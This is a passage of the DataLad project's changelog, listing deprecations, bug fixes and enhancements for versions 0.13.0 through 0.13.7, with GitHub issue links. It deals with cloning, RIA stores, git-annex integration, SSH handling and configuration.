(`#4583 <https://github.com/datalad/datalad/issues/4583>`__)\n\n- The ``saver`` argument of ``datalad.core.local.run.run_command``,\n marked as obsolete in 0.12.0, has been removed.\n (`#4583 <https://github.com/datalad/datalad/issues/4583>`__)\n\n- The ``dataset_only`` argument of the ``ConfigManager`` class was\n deprecated in 0.12 and has now been removed.\n (`#4828 <https://github.com/datalad/datalad/issues/4828>`__)\n\n- The ``linux_distribution_name``, ``linux_distribution_release``, and\n ``on_debian_wheezy`` attributes in ``datalad.utils`` are no longer\n set at import time and will be removed in a later release. Use\n ``datalad.utils.get_linux_distribution`` instead.\n (`#4696 <https://github.com/datalad/datalad/issues/4696>`__)\n\n- ``datalad.distribution.clone``, which was marked as obsolete in v0.12\n in favor of ``datalad.core.distributed.clone``, has been removed.\n (`#4904 <https://github.com/datalad/datalad/issues/4904>`__)\n\n- ``datalad.support.annexrepo.N_AUTO_JOBS``, announced as deprecated in\n v0.12.6, has been removed.\n (`#4904 <https://github.com/datalad/datalad/issues/4904>`__)\n\n- The ``compat`` parameter of ``GitRepo.get_submodules``, added in\n v0.12 as a temporary compatibility layer, has been removed.\n (`#4904 <https://github.com/datalad/datalad/issues/4904>`__)\n\n- The long-deprecated (and non-functional) ``url`` parameter of\n ``GitRepo.__init__`` has been removed.\n (`#5342 <https://github.com/datalad/datalad/issues/5342>`__)\n\n.. _fixes-5:\n\nFixes\n-----\n\n- Cloning onto a system that enters adjusted branches by default (as\n Windows does) did not properly record the clone URL.\n (`#5128 <https://github.com/datalad/datalad/issues/5128>`__)\n\n- The RIA-specific handling after calling\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n was correctly triggered by ``ria+http`` URLs but not ``ria+https``\n URLs. 
(`#4977 <https://github.com/datalad/datalad/issues/4977>`__)\n\n- If the registered commit wasn’t found when cloning a subdataset, the\n failed attempt was left around.\n (`#5391 <https://github.com/datalad/datalad/issues/5391>`__)\n\n- The remote calls to ``cp`` and ``chmod`` in\n `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n were not portable and failed on macOS.\n (`#5108 <https://github.com/datalad/datalad/issues/5108>`__)\n\n- A more reliable check is now done to decide if configuration files\n need to be reloaded.\n (`#5276 <https://github.com/datalad/datalad/issues/5276>`__)\n\n- The internal command runner’s handling of the event loop has been\n improved to play nicer with outside applications and scripts that use\n asyncio. (`#5350 <https://github.com/datalad/datalad/issues/5350>`__)\n (`#5367 <https://github.com/datalad/datalad/issues/5367>`__)\n\n.. _enhancements-and-new-features-8:\n\nEnhancements and new features\n-----------------------------\n\n- The subdataset handling for adjusted branches, which is particularly\n important on Windows where git-annex enters an adjusted branch by\n default, has been improved. A core piece of the new approach is\n registering the commit of the primary branch, not its checked out\n adjusted branch, in the superdataset. Note: This means that\n ``git status`` will always consider a subdataset on an adjusted\n branch as dirty while ``datalad status`` will look more closely and\n see if the tip of the primary branch matches the registered commit.\n (`#5241 <https://github.com/datalad/datalad/issues/5241>`__)\n\n- The performance of the\n `subdatasets <http://datalad.readthedocs.io/en/latest/generated/man/datalad-subdatasets.html>`__\n command has been improved, with substantial speedups for recursive\n processing of many subdatasets.\n (`#4868 <https://github.com/datalad/datalad/issues/4868>`__)\n (`#5076 <https://github.com/datalad/datalad/issues/5076>`__)\n\n- Adding new subdatasets via\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n has been sped up.\n (`#4793 <https://github.com/datalad/datalad/issues/4793>`__)\n\n- `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__,\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__,\n and\n `addurls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html>`__\n gained support for parallel operations that can be enabled via the\n ``--jobs`` command-line option or the new\n ``datalad.runtime.max-jobs`` configuration option.\n (`#5022 <https://github.com/datalad/datalad/issues/5022>`__)\n\n- `addurls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html>`__\n\n - learned how to read data from standard input.\n (`#4669 <https://github.com/datalad/datalad/issues/4669>`__)\n - now supports tab-separated input.\n (`#4845 <https://github.com/datalad/datalad/issues/4845>`__)\n - now lets Python callers pass in a list of records rather than a\n file name.\n (`#5285 <https://github.com/datalad/datalad/issues/5285>`__)\n - gained a ``--drop-after`` switch that signals to drop a file’s\n content after downloading and adding it to the annex.\n (`#5081 <https://github.com/datalad/datalad/issues/5081>`__)\n - is now able to construct a tree of files from known checksums\n without downloading content via its new ``--key`` option.\n (`#5184 <https://github.com/datalad/datalad/issues/5184>`__)\n - records the URL file in the 
commit message as provided by the\n caller rather than using the resolved absolute path.\n (`#5091 <https://github.com/datalad/datalad/issues/5091>`__)\n - is now speedier.\n (`#4867 <https://github.com/datalad/datalad/issues/4867>`__)\n (`#5022 <https://github.com/datalad/datalad/issues/5022>`__)\n\n- `create-sibling-github <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-github.html>`__\n learned how to create private repositories (thanks to Nolan Nichols).\n (`#4769 <https://github.com/datalad/datalad/issues/4769>`__)\n\n- `create-sibling-ria <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-ria.html>`__\n gained a ``--storage-sibling`` option. When\n ``--storage-sibling=only`` is specified, the storage sibling is\n created without an accompanying Git sibling. This enables using hosts\n without Git installed for storage.\n (`#5090 <https://github.com/datalad/datalad/issues/5090>`__)\n\n- The download machinery (and thus the ``datalad`` special remote)\n gained support for a new scheme, ``shub://``, which follows the same\n format used by ``singularity run`` and friends. In contrast to the\n short-lived URLs obtained by querying Singularity Hub directly,\n ``shub://`` URLs are suitable for registering with git-annex.\n (`#4816 <https://github.com/datalad/datalad/issues/4816>`__)\n\n- A provider is now included for https://registry-1.docker.io URLs.\n This is useful for storing an image’s blobs in a dataset and\n registering the URLs with git-annex.\n (`#5129 <https://github.com/datalad/datalad/issues/5129>`__)\n\n- The ``add-readme`` command now links to the `DataLad\n handbook <http://handbook.datalad.org>`__ rather than\n http://docs.datalad.org.\n (`#4991 <https://github.com/datalad/datalad/issues/4991>`__)\n\n- New option ``datalad.locations.extra-procedures`` specifies an\n additional location that should be searched for procedures.\n (`#5156 <https://github.com/datalad/datalad/issues/5156>`__)\n\n- The class for handling configuration values, ``ConfigManager``, now\n takes a lock before writes to allow for multiple processes to modify\n the configuration of a dataset.\n (`#4829 <https://github.com/datalad/datalad/issues/4829>`__)\n\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n now records the original, unresolved URL for a subdataset under\n ``submodule.<name>.datalad-url`` in the parent’s .gitmodules,\n enabling later\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n calls to use the original URL. This is particularly useful for\n ``ria+`` URLs.\n (`#5346 <https://github.com/datalad/datalad/issues/5346>`__)\n\n- Installing a subdataset now uses custom handling rather than calling\n ``git submodule update --init``. This avoids some locking issues when\n running\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n in parallel and enables more accurate source URLs to be recorded.\n (`#4853 <https://github.com/datalad/datalad/issues/4853>`__)\n\n- ``GitRepo.get_content_info``, a helper that gets triggered by many\n commands, got faster by tweaking its ``git ls-files`` call.\n (`#5067 <https://github.com/datalad/datalad/issues/5067>`__)\n\n- `wtf <http://datalad.readthedocs.io/en/latest/generated/man/datalad-wtf.html>`__\n now includes credentials-related information (e.g. 
active backends)\n in its output.\n (`#4982 <https://github.com/datalad/datalad/issues/4982>`__)\n\n- The ``call_git*`` methods of ``GitRepo`` now have a ``read_only``\n parameter. Callers can set this to ``True`` to promise that the\n provided command does not write to the repository, bypassing the cost\n of some checks and locking.\n (`#5070 <https://github.com/datalad/datalad/issues/5070>`__)\n\n- New ``call_annex*`` methods in the ``AnnexRepo`` class provide an\n interface for running git-annex commands similar to that of the\n ``GitRepo.call_git*`` methods.\n (`#5163 <https://github.com/datalad/datalad/issues/5163>`__)\n\n- It’s now possible to register a custom metadata indexer that is\n discovered by\n `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n and used to generate an index.\n (`#4963 <https://github.com/datalad/datalad/issues/4963>`__)\n\n- The ``ConfigManager`` methods ``get``, ``getbool``, ``getfloat``, and\n ``getint`` now return a single value (with same precedence as\n ``git config --get``) when there are multiple values for the same\n key (in the non-committed git configuration, if the key is present\n there, or in the dataset configuration). For ``get``, the old\n behavior can be restored by specifying ``get_all=True`` (see the\n sketch at the end of this list).\n (`#4924 <https://github.com/datalad/datalad/issues/4924>`__)\n\n- Command-line scripts are now defined via the ``entry_points``\n argument of ``setuptools.setup`` instead of the ``scripts`` argument.\n (`#4695 <https://github.com/datalad/datalad/issues/4695>`__)\n\n- Interactive use of ``--help`` on the command-line now invokes a pager\n on more systems and installation setups.\n (`#5344 <https://github.com/datalad/datalad/issues/5344>`__)\n\n- The ``datalad`` special remote now tries to eliminate some\n unnecessary interactions with git-annex by being smarter about how it\n queries for URLs associated with a key.\n (`#4955 <https://github.com/datalad/datalad/issues/4955>`__)\n\n- The ``GitRepo`` class now does a better job of handling bare\n repositories, a step towards bare repositories support in DataLad.\n (`#4911 <https://github.com/datalad/datalad/issues/4911>`__)\n\n- More internal work to move the code base over to the new command\n runner. (`#4699 <https://github.com/datalad/datalad/issues/4699>`__)\n (`#4855 <https://github.com/datalad/datalad/issues/4855>`__)\n (`#4900 <https://github.com/datalad/datalad/issues/4900>`__)\n (`#4996 <https://github.com/datalad/datalad/issues/4996>`__)\n (`#5002 <https://github.com/datalad/datalad/issues/5002>`__)\n (`#5141 <https://github.com/datalad/datalad/issues/5141>`__)\n (`#5142 <https://github.com/datalad/datalad/issues/5142>`__)\n (`#5229 <https://github.com/datalad/datalad/issues/5229>`__)
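\n\n- A minimal sketch of the single-value ``get`` behavior noted above; the\n dataset path and configuration key are illustrative assumptions, not\n part of this release note::\n\n   from datalad.api import Dataset\n\n   ds = Dataset('/tmp/myds')  # hypothetical dataset location\n   # default: returns a single value (same precedence as git config --get)\n   value = ds.config.get('datalad.example.key')\n   # restore the previous list-returning behavior\n   values = ds.config.get('datalad.example.key', get_all=True)\n\n0.13.7 (January 04, 2021) – .\n=============================\n\n.. 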
_fixes-6:\n\nFixes\n-----\n\n- Cloning from a RIA store on the local file system initialized annex\n in the Git sibling of the RIA source, which is problematic because\n all annex-related functionality should go through the storage\n sibling.\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n now sets ``remote.origin.annex-ignore`` to ``true`` after cloning\n from RIA stores to prevent this.\n (`#5255 <https://github.com/datalad/datalad/issues/5255>`__)\n\n- `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n invoked ``cp`` in a way that was not compatible with macOS.\n (`#5269 <https://github.com/datalad/datalad/issues/5269>`__)\n\n- Due to a bug in older Git versions (before 2.25), calling\n `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__\n with a file under .git/ (e.g., ``datalad status .git/config``)\n incorrectly reported the file as untracked. A workaround has been\n added. (`#5258 <https://github.com/datalad/datalad/issues/5258>`__)\n\n- Update tests for compatibility with latest git-annex.\n (`#5254 <https://github.com/datalad/datalad/issues/5254>`__)\n\n.. _enhancements-and-new-features-9:\n\nEnhancements and new features\n-----------------------------\n\n- `copy-file <http://datalad.readthedocs.io/en/latest/generated/man/datalad-copy-file.html>`__\n now aborts if .git/ is in the target directory, adding to its\n existing .git/ safety checks.\n (`#5258 <https://github.com/datalad/datalad/issues/5258>`__)\n\n0.13.6 (December 14, 2020) – .\n==============================\n\n.. _fixes-7:\n\nFixes\n-----\n\n- An assortment of fixes for Windows compatibility.\n (`#5113 <https://github.com/datalad/datalad/issues/5113>`__)\n (`#5119 <https://github.com/datalad/datalad/issues/5119>`__)\n (`#5125 <https://github.com/datalad/datalad/issues/5125>`__)\n (`#5127 <https://github.com/datalad/datalad/issues/5127>`__)\n (`#5136 <https://github.com/datalad/datalad/issues/5136>`__)\n (`#5201 <https://github.com/datalad/datalad/issues/5201>`__)\n (`#5200 <https://github.com/datalad/datalad/issues/5200>`__)\n (`#5214 <https://github.com/datalad/datalad/issues/5214>`__)\n\n- Adding a subdataset on a system that defaults to using an adjusted\n branch (i.e. 
doesn’t support symlinks) didn’t properly set up the\n submodule URL if the source dataset was not in an adjusted state.\n (`#5127 <https://github.com/datalad/datalad/issues/5127>`__)\n\n- `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__\n failed to push to a remote that did not have an ``annex-uuid`` value\n in the local ``.git/config``.\n (`#5148 <https://github.com/datalad/datalad/issues/5148>`__)\n\n- The default renderer has been improved to avoid a spurious leading\n space, which led to the displayed path being incorrect in some cases.\n (`#5121 <https://github.com/datalad/datalad/issues/5121>`__)\n\n- `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n showed an uninformative error message when asked to configure an\n unknown remote.\n (`#5146 <https://github.com/datalad/datalad/issues/5146>`__)\n\n- `drop <http://datalad.readthedocs.io/en/latest/generated/man/datalad-drop.html>`__\n confusingly relayed a suggestion from ``git annex drop`` to use\n ``--force``, an option that does not exist in ``datalad drop``.\n (`#5194 <https://github.com/datalad/datalad/issues/5194>`__)\n\n- `create-sibling-github <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-github.html>`__\n no longer offers user/password authentication because it is no longer\n supported by GitHub.\n (`#5218 <https://github.com/datalad/datalad/issues/5218>`__)\n\n- The internal command runner’s handling of the event loop has been\n tweaked to hopefully fix issues with running DataLad from IPython.\n (`#5106 <https://github.com/datalad/datalad/issues/5106>`__)\n\n- SSH cleanup wasn’t reliably triggered by the ORA special remote on\n failure, leading to a stall with a particular version of git-annex,\n 8.20201103. (This is also resolved on git-annex’s end as of\n 8.20201127.)\n (`#5151 <https://github.com/datalad/datalad/issues/5151>`__)\n\n.. _enhancements-and-new-features-10:\n\nEnhancements and new features\n-----------------------------\n\n- The credential helper no longer asks the user to repeat tokens or AWS\n keys. (`#5219 <https://github.com/datalad/datalad/issues/5219>`__)\n\n- The new option ``datalad.locations.sockets`` controls where DataLad\n stores SSH sockets, allowing users to more easily work around file\n system and path length restrictions.\n (`#5238 <https://github.com/datalad/datalad/issues/5238>`__)\n\n0.13.5 (October 30, 2020) – .\n=============================\n\n.. _fixes-8:\n\nFixes\n-----\n\n- SSH connection handling has been reworked to fix cloning on Windows.\n A new configuration option, ``datalad.ssh.multiplex-connections``,\n defaults to false on Windows.\n (`#5042 <https://github.com/datalad/datalad/issues/5042>`__)\n\n- The ORA special remote and post-clone RIA configuration now provide\n authentication via DataLad’s credential mechanism and better handling\n of HTTP status codes.\n (`#5025 <https://github.com/datalad/datalad/issues/5025>`__)\n (`#5026 <https://github.com/datalad/datalad/issues/5026>`__)\n\n- By default, if a git executable is present in the same location as\n git-annex, DataLad modifies ``PATH`` when running git and git-annex\n so that the bundled git is used. 
This logic has been tightened to\n avoid unnecessarily adjusting the path, reducing the cases where the\n adjustment interferes with the local environment, such as special\n remotes in a virtual environment being masked by the system-wide\n variants.\n (`#5035 <https://github.com/datalad/datalad/issues/5035>`__)\n\n- git-annex is now consistently invoked as “git annex” rather than\n “git-annex” to work around failures on Windows.\n (`#5001 <https://github.com/datalad/datalad/issues/5001>`__)\n\n- `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__\n called ``git annex sync ...`` on plain git repositories.\n (`#5051 <https://github.com/datalad/datalad/issues/5051>`__)\n\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n in general doesn’t support registering multiple levels of untracked\n subdatasets, but it can now properly register nested subdatasets when\n all of the subdataset paths are passed explicitly (e.g.,\n ``datalad save -d. sub-a sub-a/sub-b``).\n (`#5049 <https://github.com/datalad/datalad/issues/5049>`__)\n\n- When called with ``--sidecar`` and ``--explicit``,\n `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n didn’t save the sidecar.\n (`#5017 <https://github.com/datalad/datalad/issues/5017>`__)\n\n- A couple of spots didn’t properly quote format fields when combining\n substrings into a format string.\n (`#4957 <https://github.com/datalad/datalad/issues/4957>`__)\n\n- The default credentials configured for ``indi-s3`` prevented\n anonymous access.\n (`#5045 <https://github.com/datalad/datalad/issues/5045>`__)\n\n.. _enhancements-and-new-features-11:\n\nEnhancements and new features\n-----------------------------\n\n- Messages about suppressed similar results are now rate limited to\n improve performance when there are many similar results coming\n through quickly.\n (`#5060 <https://github.com/datalad/datalad/issues/5060>`__)\n\n- `create-sibling-github <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-github.html>`__\n can now be told to replace an existing sibling by passing\n ``--existing=replace``.\n (`#5008 <https://github.com/datalad/datalad/issues/5008>`__)\n\n- Progress bars now react to changes in the terminal’s width (requires\n tqdm 2.1 or later).\n (`#5057 <https://github.com/datalad/datalad/issues/5057>`__)\n\n0.13.4 (October 6, 2020) – .\n============================\n\n.. 
_fixes-9:\n\nFixes\n-----\n\n- Ephemeral clones mishandled bare repositories.\n (`#4899 <https://github.com/datalad/datalad/issues/4899>`__)\n\n- The post-clone logic for configuring RIA stores didn’t consider\n ``https://`` URLs.\n (`#4977 <https://github.com/datalad/datalad/issues/4977>`__)\n\n- DataLad custom remotes didn’t escape newlines in messages sent to\n git-annex.\n (`#4926 <https://github.com/datalad/datalad/issues/4926>`__)\n\n- The datalad-archives special remote incorrectly treated file names as\n percent-encoded.\n (`#4953 <https://github.com/datalad/datalad/issues/4953>`__)\n\n- The result handler didn’t properly escape “%” when constructing its\n message template.\n (`#4953 <https://github.com/datalad/datalad/issues/4953>`__)\n\n- In v0.13.0, the tailored rendering for specific subtypes of external\n command failures (e.g., “out of space” or “remote not available”) was\n unintentionally switched to the default rendering.\n (`#4966 <https://github.com/datalad/datalad/issues/4966>`__)\n\n- Various fixes and updates for the NDA authenticator.\n (`#4824 <https://github.com/datalad/datalad/issues/4824>`__)\n\n- The helper for getting a versioned S3 URL did not support anonymous\n access or buckets with “.” in their name.\n (`#4985 <https://github.com/datalad/datalad/issues/4985>`__)\n\n- Several issues with the handling of S3 credentials and token\n expiration have been addressed.\n (`#4927 <https://github.com/datalad/datalad/issues/4927>`__)\n (`#4931 <https://github.com/datalad/datalad/issues/4931>`__)\n (`#4952 <https://github.com/datalad/datalad/issues/4952>`__)\n\n.. _enhancements-and-new-features-12:\n\nEnhancements and new features\n-----------------------------\n\n- A warning is now given if the detected Git is below v2.13.0 to let\n users that run into problems know that their Git version is likely\n the culprit.\n (`#4866 <https://github.com/datalad/datalad/issues/4866>`__)\n\n- A fix to\n `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__\n in v0.13.2 introduced a regression that surfaces when\n ``push.default`` is configured to “matching” and prevents the\n git-annex branch from being pushed. Note that, as part of the fix,\n the current branch is now always pushed even when it wouldn’t be\n based on the configured refspec or ``push.default`` value.\n (`#4896 <https://github.com/datalad/datalad/issues/4896>`__)\n\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n\n - now allows spelling the empty string value of ``--since=`` as\n ``^`` for consistency with\n `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__.\n (`#4683 <https://github.com/datalad/datalad/issues/4683>`__)\n - compares a revision given to ``--since=`` with ``HEAD`` rather\n than the working tree to speed up the operation.\n (`#4448 <https://github.com/datalad/datalad/issues/4448>`__)\n\n- `rerun <https://datalad.readthedocs.io/en/latest/generated/man/datalad-rerun.html>`__\n\n - emits more INFO-level log messages.\n (`#4764 <https://github.com/datalad/datalad/issues/4764>`__)\n - provides better handling of adjusted branches and aborts with a\n clear error for cases that are not supported.\n (`#5328 <https://github.com/datalad/datalad/issues/5328>`__)\n\n- The archives are handled with p7zip, if available, since DataLad\n v0.12.0. 
This implementation now supports .tgz and .tbz2 archives.\n (`#4877 <https://github.com/datalad/datalad/issues/4877>`__)\n\n0.13.3 (August 28, 2020) – .\n============================\n\n.. _fixes-10:\n\nFixes\n-----\n\n- Work around a Python bug that led to our asyncio-based command runner\n intermittently failing to capture the output of commands that exit\n very quickly.\n (`#4835 <https://github.com/datalad/datalad/issues/4835>`__)\n\n- `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__\n displayed an overestimate of the transfer size when multiple files\n pointed to the same key.\n (`#4821 <https://github.com/datalad/datalad/issues/4821>`__)\n\n- When\n `download-url <https://datalad.readthedocs.io/en/latest/generated/man/datalad-download-url.html>`__\n calls ``git annex addurl``, it catches and reports any failures\n rather than crashing. A change in v0.12.0 broke this handling in a\n particular case.\n (`#4817 <https://github.com/datalad/datalad/issues/4817>`__)\n\n.. _enhancements-and-new-features-13:\n\nEnhancements and new features\n-----------------------------\n\n- The wrapper functions returned by decorators are now given more\n meaningful names to hopefully make tracebacks easier to digest.\n (`#4834 <https://github.com/datalad/datalad/issues/4834>`__)\n\n0.13.2 (August 10, 2020) – .\n============================\n\nDeprecations\n------------\n\n- The ``allow_quick`` parameter of ``AnnexRepo.file_has_content`` and\n ``AnnexRepo.is_under_annex`` is now ignored and will be removed in a\n later release. This parameter was only relevant for git-annex\n versions before 7.20190912.\n (`#4736 <https://github.com/datalad/datalad/issues/4736>`__)\n\n.. _fixes-11:\n\nFixes\n-----\n\n- Updates for compatibility with recent git and git-annex releases.\n (`#4746 <https://github.com/datalad/datalad/issues/4746>`__)\n (`#4760 <https://github.com/datalad/datalad/issues/4760>`__)\n (`#4684 <https://github.com/datalad/datalad/issues/4684>`__)\n\n- `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__\n didn’t sync the git-annex branch when ``--data=nothing`` was\n specified.\n (`#4786 <https://github.com/datalad/datalad/issues/4786>`__)\n\n- The ``datalad.clone.reckless`` configuration wasn’t stored in\n non-annex datasets, preventing the values from being inherited by\n annex subdatasets.\n (`#4749 <https://github.com/datalad/datalad/issues/4749>`__)\n\n- Running the post-update hook installed by ``create-sibling --ui``\n could overwrite web log files from previous runs in the unlikely\n event that the hook was executed multiple times in the same second.\n (`#4745 <https://github.com/datalad/datalad/issues/4745>`__)\n\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n inspected git’s standard error in a way that could cause an attribute\n error. (`#4775 <https://github.com/datalad/datalad/issues/4775>`__)\n\n- When cloning a repository whose ``HEAD`` points to a branch without\n commits,\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n tries to find a more useful branch to check out. 
It unwisely\n considered adjusted branches.\n (`#4792 <https://github.com/datalad/datalad/issues/4792>`__)\n\n- Since v0.12.0, ``SSHManager.close`` hasn’t closed connections when\n the ``ctrl_path`` argument was explicitly given.\n (`#4757 <https://github.com/datalad/datalad/issues/4757>`__)\n\n- When working in a dataset in which ``git annex init`` had not yet\n been called, the ``file_has_content`` and ``is_under_annex`` methods\n of ``AnnexRepo`` incorrectly took the “allow quick” code path on file\n systems that did not support it\n (`#4736 <https://github.com/datalad/datalad/issues/4736>`__)\n\nEnhancements\n------------\n\n- `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__\n now assigns version 4 (random) UUIDs instead of version 1 UUIDs that\n encode the time and hardware address.\n (`#4790 <https://github.com/datalad/datalad/issues/4790>`__)\n\n- The documentation for\n `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__\n now does a better job of describing the interaction between\n ``--dataset`` and ``PATH``.\n (`#4763 <https://github.com/datalad/datalad/issues/4763>`__)\n\n- The ``format_commit`` and ``get_hexsha`` methods of ``GitRepo`` have\n been sped up.\n (`#4807 <https://github.com/datalad/datalad/issues/4807>`__)\n (`#4806 <https://github.com/datalad/datalad/issues/4806>`__)\n\n- A better error message is now shown when the ``^`` or ``^.``\n shortcuts for ``--dataset`` do not resolve to a dataset.\n (`#4759 <https://github.com/datalad/datalad/issues/4759>`__)\n\n- A more helpful error message is now shown if a caller tries to\n download an ``ftp://`` link but does not have ``request_ftp``\n installed.\n (`#4788 <https://github.com/datalad/datalad/issues/4788>`__)\n\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n now tries harder to get up-to-date availability information after\n auto-enabling ``type=git`` special remotes.\n (`#2897 <https://github.com/datalad/datalad/issues/2897>`__)\n\n0.13.1 (July 17, 2020) – .\n==========================\n\n.. _fixes-12:\n\nFixes\n-----\n\n- Cloning a subdataset should inherit the parent’s\n ``datalad.clone.reckless`` value, but that did not happen when\n cloning via ``datalad get`` rather than ``datalad install`` or\n ``datalad clone``.\n (`#4657 <https://github.com/datalad/datalad/issues/4657>`__)\n\n- The default result renderer crashed when the result did not have a\n ``path`` key.\n (`#4666 <https://github.com/datalad/datalad/issues/4666>`__)\n (`#4673 <https://github.com/datalad/datalad/issues/4673>`__)\n\n- ``datalad push`` didn’t show information about ``git push`` errors\n when the output was not in the format that it expected.\n (`#4674 <https://github.com/datalad/datalad/issues/4674>`__)\n\n- ``datalad push`` silently accepted an empty string for ``--since``\n even though it is an invalid value.\n (`#4682 <https://github.com/datalad/datalad/issues/4682>`__)\n\n- Our JavaScript testing setup on Travis grew stale and has now been\n updated. (Thanks to Xiao Gui.)\n (`#4687 <https://github.com/datalad/datalad/issues/4687>`__)\n\n- The new class for running Git commands (added in v0.13.0) ignored any\n changes to the process environment that occurred after instantiation.\n (`#4703 <https://github.com/datalad/datalad/issues/4703>`__)\n\n.. 
_enhancements-and-new-features-14:\n\nEnhancements and new features\n-----------------------------\n\n- ``datalad push`` now avoids unnecessary ``git push`` dry runs and\n pushes all refspecs with a single ``git push`` call rather than\n invoking ``git push`` for each one.\n (`#4692 <https://github.com/datalad/datalad/issues/4692>`__)\n (`#4675 <https://github.com/datalad/datalad/issues/4675>`__)\n\n- The readability of SSH error messages has been improved.\n (`#4729 <https://github.com/datalad/datalad/issues/4729>`__)\n\n- ``datalad.support.annexrepo`` avoids calling\n ``datalad.utils.get_linux_distribution`` at import time and caches\n the result once it is called because, as of Python 3.8, the function\n uses ``distro`` underneath, adding noticeable overhead.\n (`#4696 <https://github.com/datalad/datalad/issues/4696>`__)\n\n Third-party code should be updated to use ``get_linux_distribution``\n directly in the unlikely event that the code relied on the\n import-time call to ``get_linux_distribution`` setting the\n ``linux_distribution_name``, ``linux_distribution_release``, or\n ``on_debian_wheezy`` attributes in \\`datalad.utils.\n\n0.13.0 (June 23, 2020) – .\n==========================\n\nA handful of new commands, including ``copy-file``, ``push``, and\n``create-sibling-ria``, along with various fixes and enhancements\n\n.. _major-refactoring-and-deprecations-1:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- The ``no_annex`` parameter of\n `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__,\n which is exposed in the Python API but not the command line, is\n deprecated and will be removed in a later release. Use the new\n ``annex`` argument instead, flipping the value. Command-line callers\n that use ``--no-annex`` are unaffected.\n (`#4321 <https://github.com/datalad/datalad/issues/4321>`__)\n\n- ``datalad add``, which was deprecated in 0.12.0, has been removed.\n (`#4158 <https://github.com/datalad/datalad/issues/4158>`__)\n (`#4319 <https://github.com/datalad/datalad/issues/4319>`__)\n\n- The following ``GitRepo`` and ``AnnexRepo`` methods have been\n removed: ``get_changed_files``, ``get_missing_files``, and\n ``get_deleted_files``.\n (`#4169 <https://github.com/datalad/datalad/issues/4169>`__)\n (`#4158 <https://github.com/datalad/datalad/issues/4158>`__)\n\n- The ``get_branch_commits`` method of ``GitRepo`` and ``AnnexRepo``\n has been renamed to ``get_branch_commits_``.\n (`#3834 <https://github.com/datalad/datalad/issues/3834>`__)\n\n- The custom ``commit`` method of ``AnnexRepo`` has been removed, and\n ``AnnexRepo.commit`` now resolves to the parent method,\n ``GitRepo.commit``.\n (`#4168 <https://github.com/datalad/datalad/issues/4168>`__)\n\n- GitPython’s ``git.repo.base.Repo`` class is no longer available via\n the ``.repo`` attribute of ``GitRepo`` and ``AnnexRepo``.\n (`#4172 <https://github.com/datalad/datalad/issues/4172>`__)\n\n- ``AnnexRepo.get_corresponding_branch`` now returns ``None`` rather\n than the current branch name when a managed branch is not checked\n out. (`#4274 <https://github.com/datalad/datalad/issues/4274>`__)\n\n- The special UUID for git-annex web remotes is now available as\n ``datalad.consts.WEB_SPECIAL_REMOTE_UUID``. It remains accessible as\n ``AnnexRepo.WEB_UUID`` for compatibility, but new code should use\n ``consts.WEB_SPECIAL_REMOTE_UUID``\n (`#4460 <https://github.com/datalad/datalad/issues/4460>`__).\n\n.. 
_fixes-13:\n\nFixes\n-----\n\n- Widespread improvements in functionality and test coverage on Windows\n and crippled file systems in general.\n (`#4057 <https://github.com/datalad/datalad/issues/4057>`__)\n (`#4245 <https://github.com/datalad/datalad/issues/4245>`__)\n (`#4268 <https://github.com/datalad/datalad/issues/4268>`__)\n (`#4276 <https://github.com/datalad/datalad/issues/4276>`__)\n (`#4291 <https://github.com/datalad/datalad/issues/4291>`__)\n (`#4296 <https://github.com/datalad/datalad/issues/4296>`__)\n (`#4301 <https://github.com/datalad/datalad/issues/4301>`__)\n (`#4303 <https://github.com/datalad/datalad/issues/4303>`__)\n (`#4304 <https://github.com/datalad/datalad/issues/4304>`__)\n (`#4305 <https://github.com/datalad/datalad/issues/4305>`__)\n (`#4306 <https://github.com/datalad/datalad/issues/4306>`__)\n\n- ``AnnexRepo.get_size_from_key`` incorrectly handled file chunks.\n (`#4081 <https://github.com/datalad/datalad/issues/4081>`__)\n\n- `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n would too readily clobber existing paths when called with\n ``--existing=replace``. It now gets confirmation from the user before\n doing so if running interactively and unconditionally aborts when\n running non-interactively.\n (`#4147 